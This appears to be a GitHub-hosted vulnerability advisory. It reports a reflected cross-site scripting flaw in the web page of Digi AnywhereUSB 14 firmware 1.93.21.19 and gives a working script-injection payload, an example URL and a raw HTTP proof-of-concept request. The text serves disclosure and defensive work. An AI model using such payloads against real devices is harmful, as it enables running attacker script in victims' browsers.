| Vulnerability Type: Cross Site Scripting (XSS) Vulnerability | |
| Vendor of Product: Digi International | |
| Affected Product Code Base: AnywhereUSB - 14 | |
| Firmware Version: 1.93.21.19 | |
| Description: Digi AnywhereUSB 14 allows XSS via a link for the Digi Page. | |
| Attack Vectors: Someone must open a link for the Digi Page | |
| Attack Type: Remote | |
| Payload: //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| Steps To Reproduce | |
| 1. Browse the Web Page of the Digi’s AnywhereUSB and trying not to log in | |
| 2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim | |
| Example: http://<IP Address of the Digi Anywhere USB>///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| #PoC | |
| GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1 | |
| Host: Target IP | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment